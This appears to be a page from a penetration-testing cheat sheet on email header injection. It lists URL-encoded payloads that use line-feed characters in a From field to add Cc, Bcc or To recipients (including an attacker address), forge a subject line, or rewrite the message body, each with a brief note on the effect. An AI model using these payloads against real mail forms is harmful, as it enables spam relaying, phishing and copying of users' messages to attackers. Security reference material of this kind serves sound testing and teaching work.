search

Email Header Injection

hashtag
Email Header Injection

https://resources.infosecinstitute.com/email-injection/arrow-up-right

hashtag
Inject Cc and Bcc after sender argument

From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

The message will be sent to the recipient and recipient1 accounts.

hashtag
Inject argument

From:sender@domain.com%0ATo:attacker@domain.com

The message will be sent to the original recipient and the attacker account.

hashtag
Inject Subject argument

From:sender@domain.com%0ASubject:This is%20Fake%20Subject

The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.

hashtag
Change the body of the message

Inject a two-line feed, then write your message to change the body of the message.

PreviousUncovering CloudFlareNextUnicode Normalization vulnerability

Last updated

Was this helpful?